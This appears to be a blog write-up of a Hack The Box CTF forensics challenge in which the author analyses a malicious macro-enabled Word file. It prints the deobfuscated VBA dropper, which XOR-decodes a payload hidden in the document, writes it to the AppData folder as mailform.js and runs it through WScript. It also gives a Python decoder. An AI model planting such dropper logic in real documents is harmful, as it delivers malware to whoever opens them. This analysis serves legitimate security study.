# Forensics: Game Invitation

# Introduction

> In the bustling city of KORP™, where factions vie in The Fray, a mysterious game emerges. As a seasoned faction member, you feel the tension growing by the minute. Whispers spread of a new challenge, piquing both curiosity and wariness. Then, an email arrives: "Join The Fray: Embrace the Challenge." But lurking beneath the excitement is a nagging doubt. Could this invitation hide something more sinister within its innocent attachment?

**Type**: Forensics  
**Difficulty**: Hard  
**Event**: [**Hack The Box Cyber Apocalypse 2024: Hacker Royale**](https://ctf.hackthebox.com/event/details/cyber-apocalypse-2024-hacker-royale-1386) ([**ctftime**](https://ctftime.org/event/2255))

%%[support-cta] 

# Initial recon

Given: single DOCM file.

```plaintext
$ invitation.docm (read-only)
ce9f4c1bd44ff0a9131e63cf4f8c0ce5c1c8e4eb77bffe843a325d08b34eb9bb
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710578173550/297e0350-f9ae-4a3e-9f63-8eca7f459170.png align="center")

# Investigation

DOCM is are macro-enabled Microsoft Word document format. Analysis of this kind of files are in my opinion the most popular tasks whenever forensics category is included in CTF events. I covered two of those in my blog:

* [HTB Business CTF 2021: badRansomware](https://blog.cyberethical.me/htb-business-ctf-2021-badransomware)
    
* [HackTheBoo 2022: Halloween Invitation](https://blog.cyberethical.me/hacktheboo-2022-htb-ctf-write-ups#heading-halloween-invitation)
    

So without further ado, let's extract that VBA macro using [olevba](https://github.com/decalage2/oletools/wiki/olevba) Python script.

```plaintext
$ olevba invitation.docm
//... (output trimmed for readability)
```

# VBA macro

I will save you reading the origal, obfuscated script.

## Stage 01 (deobfuscated)

```basic
Public jspath As String
Public appdataPath As String

Function xorString(given_string() As Byte, length As Long) As Boolean
    Dim xor_key As Byte
    xor_key = 45
    For i = 0 To length - 1
        given_string(i) = given_string(i) Xor xor_key
        xor_key = ((xor_key Xor 99) Xor (i Mod 254))
    Next i
    xorString = TRUE
End Function

Dim filenumber
Dim file_length As Long
Dim length As Long
file_length = FileLen(ActiveDocument.FullName)
filenumber = FreeFile
Open (ActiveDocument.FullName) For Binary As #filenumber
Dim byteArray() As Byte
ReDim byteArray(file_length)
Get #filenumber, 1, byteArray
Dim convertedToUnicode As String
convertedToUnicode = StrConv(byteArray, vbUnicode)
Dim singeMatch, matches
Dim regexp
Set regexp = CreateObject("vbscript.regexp")
regexp.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa"
Set matches = regexp.Execute(convertedToUnicode)
Dim indexOfFirstMatch
If matches.Count = 0 Then
    GoTo lable1
End If
For Each singleMatch In matches
    indexOfFirstMatch = singleMatch.FirstIndex
    Exit For
Next
Dim secondByteArray() As Byte
Dim arbitraryLength As Long
arbitraryLength = 13082
ReDim secondByteArray(arbitraryLength)
Get #filenumber, indexOfFirstMatch + 81, secondByteArray
If Not xorString(secondByteArray(), arbitraryLength + 1) Then
    GoTo lable1
End If
appdataPath = Environ("appdata") & "\Microsoft\Windows"
Set fileSystemObject = CreateObject("Scripting.FileSystemObject")
If Not fileSystemObject.FolderExists(appdataPath) Then
    appdataPath = Environ("appdata")
End If
Set fileSystemObject = Nothing
Dim fileNumber2
fileNumber2 = FreeFile
jspath = appdataPath & "\\" & "mailform.js"
Open (jspath) For Binary As #fileNumber2
Put #fileNumber2, 1, secondByteArray
Close #fileNumber2
Erase secondByteArray
Set shellObject = CreateObject("WScript.Shell")
shellObject.Run """" + jspath + """" + " vF8rdgMHKBrvCoCp0ulm"
ActiveDocument.Save
Exit Sub
lable1:
Close #fileNumber2
ActiveDocument.Save
End If
End Sub
```

1. Read current file (DOCM) binary.
    
2. Search for the pattern in the binary data.
    
3. Run custom XORing function over the succeeding 13082 bytes.
    
4. Resulting binary data is saves as a `mailform.js`.
    
5. WScript `mailform.js` is then executed with the argument `vF8rdgMHKBrvCoCp0ulm`
    

I have transcribed the VBA into the Python script to obtain the `mailform.js`.

## Stage 01 (Python)

```python
#!/usr/bin/python
import re

def xorString(given_string, length):
    xor_key = 45
    for i in range(length):
        given_string[i] = given_string[i] ^ xor_key
        xor_key = ((xor_key ^ 99) ^ (i % 254))
    return given_string

def main():    
    with open('invitation.docm', 'rb') as docmFile:
        byteArray = bytearray(docmFile.read())
        convertedToUnicode = byteArray

        pattern = b'sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa'
        matches = re.finditer(pattern, convertedToUnicode)
        
        indexOfFirstMatch = None
        for singleMatch in matches:
            indexOfFirstMatch = singleMatch.start()
            break
        
        if indexOfFirstMatch is None:
            print('pattern not found')
            return
        
        arbitraryLength = 13082
        docmFile.seek(indexOfFirstMatch + 80)
        secondByteArray = bytearray(docmFile.read(arbitraryLength))
        
        secondByteArray = xorString(secondByteArray, arbitraryLength)
                
        with open("mailform.js", 'wb') as docmFile2:
            docmFile2.write(secondByteArray)

if __name__ == "__main__":
    main()
```

This resulted in the JS file.

## Stage 02 (`mailform.js`)

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710582039879/d7c16e14-0dfd-4c97-b96f-17882bd3244d.png align="center")

Because it is a JavaScript we can leverage it **very carefuly** to let the browser decode the code for us and retrieve the next payload. Please do notice that I've marked the hazardous `eval(..)` function that has to be removed to neutralize the payload. I have replaces it with a `console.log(..)`.

> You never want any kind of `eval` or `Invoke-Expression` slip through.

## Stage 03

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710582752891/c10521d0-1f18-40b7-9316-3b2912c732d6.png align="center")

More JavaScript to deobfuscate. Unless..

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710582863874/461db9ca-4f35-4700-9a22-21dda7aaad64.png align="center")

And after decoding this in CyberChef 🎉

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710582987470/04941aaa-cb4d-4387-8f40-8f45c4308b2b.png align="center")

# Additional reading

%%[follow-cta] 

* [MITRE T1137.001 (Office Application Startup: Office Template Macros](https://attack.mitre.org/techniques/T1137/001/))

* ⭐ [Official HTB write-up](https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/forensics/%5BHard%5D%20Game%20Invitation)
    
* [Write-up: HTB Business CTF 2021: badRansomware](https://blog.cyberethical.me/htb-business-ctf-2021-badransomware)
    
* [Write-up: HackTheBoo 2022: Halloween Invitation](https://blog.cyberethical.me/hacktheboo-2022-htb-ctf-write-ups#heading-halloween-invitation)
